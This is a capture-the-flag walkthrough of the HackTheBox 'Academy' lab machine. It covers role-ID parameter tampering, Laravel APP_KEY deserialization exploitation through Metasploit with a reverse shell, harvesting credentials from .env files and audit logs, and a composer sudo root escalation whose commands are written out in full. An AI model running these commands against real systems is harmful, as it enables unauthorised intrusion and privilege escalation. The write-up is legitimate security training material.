HackTheBox: (“Academy”) — Walkthrough
Hi people :D
Today we’ll solve “Academy” machine from HackTheBox, an easy machine with good ideas, let’s get started.
Enumeration
— — — — — — —
Start with Nmap
nmap -A 10.10.10.215
We have two ports, 22 ( SSH ) and 80 ( HTTP ), add machine IP as academy.htb to /etc/hosts file.
Web Enumeration
— — — — — — — —
Now go to your browser and navigate to http://academy.htp
There is a register function so let’s open Burp Suite and make an account
I noticed that is a roleid parameter, if you familiar with Web pentesting you know that this kind of parameters often vulnerable to Parameter-based access control vulnerability
Now change the roleid value to 1 then login with your account
After login, you’ll be redirected to this page that looks like the original HackTheBox Academy site. run any directory brute forcer tool such as dirsearch, you’ll find admin directory
./dirsearch.py -u http://academy.htb/ -e "*" -x 500-599,400-499
Navigate to the admin directory, you will find useful information such as dev domain and two users ( cry0l1t3 & mrb3n )
Add dev-staging-01.academy.htb to /etc/hosts then move to it
Scroll down a bit, you will see that the website uses Laravel, and you will also find the APP_KEY
Exploitation
— — — — — —
I searched for any exploit for Laravel and I found this Metasploit module
Let’s try this module, first set up the module options then run it
- use exploit/unix/http/laravel_token_unserialize_exec
- set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
- set RHOSTS 10.10.10.215
- set VHOST dev-staging-01.academy.htb
- set LHOST tun0
- exploit
And we got a www-data shell ☺
User Flag
— — — — —
Make some improvements to our shell with :
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=linux
then do ls -la command to show hidden files, we found .env file so let’s read it
We found a password (mySup3rP4s5w0rd!!) try this password with cry0l1t3 user and we got a shell
Simply go to home directory and read user.txt file to get the flag
Root Flag
— — — — —
Unfortunately, we can not run sudo -l command with our privilege
After some search, I found 4 logs files in /var/logs/audit directory
These files contain a huge amount of data that makes reading them a waste of time so that I tried to grep for important strings like Password, pass, admin,sudo, su, etc..
I noticed that these files contain “comm=” string followed by any command like this: comm=“whoami”, This made the grep process much faster
I have tried some strings and found some hex data when I greped for su command
6D7262336E5F41634064336D79210A
Change this data from hex to ASCII by using any online website like this site
We found another password (mrb3n_Ac@d3my!) that seems to be mrb3n’s password
Now try sudo -l command
We can run composer as root without a password.
when I know what I can run with root privileges, I go directly to GTFOBins website, after I searched for composer sudo exploit in gtfobins I found these commands
Just copy & paste these commands :
- TF=$(mktemp -d)
- echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
- sudo composer --working-dir=$TF run-script x
After that we get a root shell, simply read root.txt and congrats! ☺
Thanks for your reading and I hope this writeup was useful to you ❤
